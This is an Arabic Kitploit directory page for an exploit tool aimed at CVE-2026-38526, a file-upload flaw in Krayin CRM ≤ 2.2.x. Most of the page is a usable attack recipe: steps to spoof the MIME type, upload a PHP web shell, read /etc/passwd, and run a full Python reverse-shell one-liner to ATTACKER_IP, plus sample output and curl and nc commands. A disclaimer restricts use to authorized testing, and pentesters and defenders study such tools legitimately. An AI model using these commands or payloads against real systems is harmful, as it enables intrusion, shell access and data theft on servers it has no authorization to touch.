Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-CVE-2026-38526 — استغلال آلي لـ Krayin CRM ≤ 2.2.x. | Kitploit
أدوات/GitHubGitHub/b0nyo/poc-cve-2026-38526
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

استغلال آلي لـ Krayin CRM ≤ 2.2.x.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38526 - ثغرة رفع PHP في Krayin CRM لتنفيذ أوامر عن بُعد (RCE)

أداة استغلال آلية لـ Krayin CRM ≤ 2.2.x. يستغل هذا السكربت ثغرة رفع ملفات غير مقيدة في نقطة نهاية TinyMCE (/admin/tinymce/upload)، ويتجاوز التحقق من نوع MIME عبر انتحال image/jpeg، ويرفع قشرة ويب PHP، وينفذ أوامر عشوائية بصلاحيات خادم الويب.


تفاصيل الثغرة

الخاصيةالقيمة
CVE IDCVE-2026-38526
البرنامج المتأثرKrayin CRM ≤ 2.2.x
نوع الثغرةرفع ملفات غير مقيدة → تنفيذ أوامر عن بُعد
المصادقةمطلوبة (أي حساب مدير صالح)
نقطة النهايةPOST /admin/tinymce/upload

المتطلبات الأساسية

  • Python 3.7+
  • بيانات اعتماد مدير صالحة لمثيل Krayin CRM المستهدف
  • وصول شبكي إلى التطبيق المستهدف
  • مكتبة requests

التثبيت

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

الاستخدام

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

الوسائط

أمثلة

root@kitploit:~
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

خطوات الاستغلال

  1. المصادقة: استخراج رمز CSRF من صفحة تسجيل الدخول، والمصادقة باستخدام بيانات الاعتماد المقدمة
  2. التحقق من الجلسة: استخراج رمز CSRF جديد من لوحة التحكم بعد المصادقة
  3. رفع قشرة الويب: رفع حمولة PHP إلى /admin/tinymce/upload مع انتحال نوع MIME
  4. تنفيذ الأوامر: تنفيذ أوامر عشوائية عبر معامل GET الخاص بقشرة الويب

نموذج الإخراج

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

المشكلات الشائعة

فشل المصادقة: تحقق من صحة بيانات الاعتماد ومن وجود الحساب على الهدف.

فشل استخراج رمز CSRF: تأكد من أن الهدف يعمل بإصدار Krayin CRM القابل للاستغلال وأن نقطة نهاية تسجيل الدخول يمكن الوصول إليها.

عدم اتصال القشرة العكسية: تأكد من تشغيل المستمع الخاص بك (nc -lvnp <PORT>)، ومن أن قواعد جدار الحماية تسمح بالاتصالات الصادرة، ومن صحة عنوان IP والمنفذ في الحمولة.


إخلاء المسؤولية

تُقدَّم هذه الأداة حصريًا لأغراض اختبار الاختراق المصرح به والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على التفويض المناسب قبل اختبار أي نظام مستهدف. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.


المراجع

  • TREXNEGRO Security Advisory - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - رفع الملفات غير المقيد

المؤلف

b0nyo - تنفيذ إثبات المفهوم (PoC)

  • GitHub

TREXNEGRO - اكتشاف الثغرة

  • الاستشارات الأمنية
تنزيل الأداة
العلمالوصفمثال
-iعنوان URL الهدف (مع أو بدون http://)http://target.com أو target.com
-uبريد المدير/اسم المستخدم[email protected]
-pكلمة مرور المديرAdminPassword123!
-cالأمر الذي سيتم تنفيذه (الافتراضي: id)whoami